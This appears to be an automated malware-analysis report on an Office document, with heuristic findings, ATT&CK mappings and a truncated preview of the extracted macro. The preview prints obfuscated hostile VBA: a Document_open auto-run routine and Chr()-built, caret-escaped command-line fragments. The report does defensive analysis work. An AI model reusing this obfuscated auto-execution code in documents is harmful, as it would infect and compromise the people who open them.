Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The critical heuristic that fired flags a Shell() call in the VBA code, a function commonly used to execute arbitrary commands or download additional payloads. A Document_Open macro is also present, so the code runs automatically when the document is opened. The script is obfuscated, which prevents a more detailed analysis of its specific actions, but the intent is clearly malicious execution.
Heuristics (5)
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29875 bytes | 99ee620906b3e4c2b72526289acefe9aefb744556ccc86c97a39dd26d08e87db |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "EjzKQdfowBwasX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jwZwfjA()
tsGwj = (58626 / VkpEh / JlcoVl / jNNEzT / jbOrr * 3830 * UiwRC * VijiU / uzOui - OVdji)
QoXzKD = (11806 / tuhWd / ABiuI / ZiBXE / wirEBG * 89993 * JlTsvT * bUwWj / aYzwo - XPimAs)
FZnRQ = (81310 / akDiBG / WNwjB / MhCHR / jhhdG * 97500 * izlXs * QObFOl / szUTYG - IzXXjA)
bhptb = (53651 / OPiqzp / zNFBYh / FuHNP / UbwSz * 46111 * wtfDu * LLJOG / CpRUhz - qjVnh)
End Function
Function PntWwMffo()
UphYzI = (60369 / NJzzjE / zWYFzp / CzPZc / OMnCZ * 20022 * EXqjYV * rwFBH / JMjjT - DPnhIY)
XSkFCd = (67978 / aYQVhf / djdoEw / llhlN / HtPKLQ * 21634 * iQaCvR * rzSLq / jzBAw - CjwXRQ)
kBVvZ = (42172 / ubfsj / PMDuOR / zBjDi / HdQqiI * 85477 * pqcJbl * OkArm / nCjnu - cXiVS)
zPoJLs = (11430 / AjoJOv / dEYSj / sElBm / NKKCQM * 10478 * ZPubT * MtEPd / AXFHDA - cHLCHY)
hJFJRU = (76018 / PClIiw / mOZWOY / NJNhIL / sImspo * 66472 * IuWikj * OpEEmM / suoDn - vvjMbT)
End Function
Private Sub Document_open()
On Error Resume Next
OqwwH = 94517 / GcLXqi * QANSSm / WnNdD * OIpTf + 65638
jRSfb = 32271 / hIaiq * ziUwGa / vwvvsN * FHtRtX + 93955
cGfdq = 9951 / OJPWut * pYQZr / GUQJo * qNaDOZ + 26957
lrIOB = 5799 / OBaMk * Frfpzo / uRbwZ * MMnzL + 73680
poEuprYaMjD = Application.Run("uCqKMmUvRpQDut", "" + JinwTpS + zWYcRjEiftrDj + CVar("c") + XOznrsI + LqiiUSjDFXj + waafif + crYwDLO + NSjNrTAszOr + UXBvWO + zwtLab + RFDrazhsVOK + wztwhTdzDH + SzWYS + DjCuhaj + rzqaRdIhW + FBPKDnZRR + AdoJbwiJIUS + bLBwq + zwpoXnHsNVX + AMHjRjHLcfQz + hluwPHqVo)
sBKjzb = 32062 / rdTmp * tloiXY / cjYRPz * ItfJn + 35604
cnFAw = 62145 / jDXDSH * aNEhJ / qpLWcf * pWuiY + 16725
End Sub
Function BKzZWTtJsbAcJq()
PRuIma = 45094 / LUvws * tvSEZ / zmHbX * wdSLwL + 73245
uhwYuq = 72698 / nPVZWa * lTTZok / PHviE * ELfXw + 59437
pmjAt = 354 / EnuPjh * phwNK / cKSkwd * DAYkMj + 96921
wCQRmO = 68982 / DKwzKz * GhrmU / wQIqO * nwkzC + 73706
iDfNU = 66402 / hHJOY * dwwbPi / TwDPGZ * PKDzj + 1633
End Function
Attribute VB_Name = "rkoiVPAkzho"
Function waafif()
On Error Resume Next
PMLcF = (USBvKM + rmIqN + TijwKK - INmCc - YlZkJN / jpNzqC + 24557 * cNbVv)
IXLhjd = QLcKil - 45709 / fcMXOl - LGpwUq * 5255 * JfwmNZ * 35528 + zkMJO
qjOBR = (pHfwTb + TRCzcQ + iRlIHz - fAKhjz - utWHw / uhhzX + 52646 * uLKcs)
wWFdPcz = CStr(Chr(LSdvXjfUFGIWI + mcfRHsQJ + 109 + LOicizdFVbBR + jXZnKLAQw)) + "d " + "/" + CStr(Chr(jYwzwuJOMMU + XJfQnoKUHNkjT + 99 + DiuQZwwYhHWjrD + MWhQBjj)) + " f^Or" + " ;" + " /^F " + "; ; " + CStr(Chr(uLcKLNfR + iRDbwYkw + 34 + ISRwIXMlM + wSHikWNVtr)) + " " + "deli" + CStr(Chr(rdoIvlrRiaL + udCoAuFOofz + 109 + LCWdOZslZUUORz + oYGGBqsLhsz)) + "s" + "=T6F"
oHVOvn = (RmbkSS + YQfEz + VXEzj - khKwdj - Xjsuz / ZuJaGA + 62292 * ROOFG)
YuFuUs = (GUQmc + ZXjsjK + wkmkjY - UpipB - QVzQN / NkaMil + 98550 * UnikLU)
dRDukrAhzjO = "H toke" + "ns= " + "+" + "2 " + CStr(Chr(DwpMzapvF + IqUIiZjukjzH + 34 + vVJKvWciUWWfB + ikjMUwKWkd)) + " ," + " %^" + "x ; " + " , In " + ", ( ;" + " " + ";"
BmHwjc = 90019 - tZizFL - 39500 + WjBjq * ubtHv / pwODA - 68400 - JqCTi
RCVhM = 4880 - HnwDz - 90417 + fVfYX * MwwzA / TSvtW - 18992 - zPqZRU
hUMZwZ = " '" + " ; " + "; " + " ^" + "^Ft^^Y" + "PE ;" + " ^| " + " " + "; ^^" + "FinDst"
UnKmo = 90360 - CkTouq - 86380 + DYhnuz * fzWBK / UMSKI - 17769 - ojVGM
TwpanGGOGdw = "r " + ", ; " + " ^" + "^SHC " + " '"
aTEPf = 47205 - TbcLF - 69488 + CmzSfs * IzBcOX / FqYMGj - 5424 - cDMvz
kMpTQK = 98386 - BkoFJI - 20989 + nkZiX * dmhTs / DabrD - 64501 - nhhtBV
fvniEitE = " ; " + "; ) ; " + "D^O " + " " + "," + " , " + "%" + "^x" + ", ,"
rlwaPv = 88513 - tOKsc - 17590 + ukCcF * XInsnM / TCqPbS - 17521 - njiKqU
rcKEi = 89442 - ipZrRW - 4318 + QBXNlE * zBjjJu / kuTIi - 19559 - ESDLup
vuPZnQlUUkw = " k2D" + "/V^4" + "^5"
... (truncated)